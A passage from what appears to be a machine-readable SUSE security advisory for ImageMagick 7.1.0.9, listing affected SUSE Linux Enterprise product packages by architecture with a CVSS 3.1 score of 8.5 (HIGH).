"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.s390x",
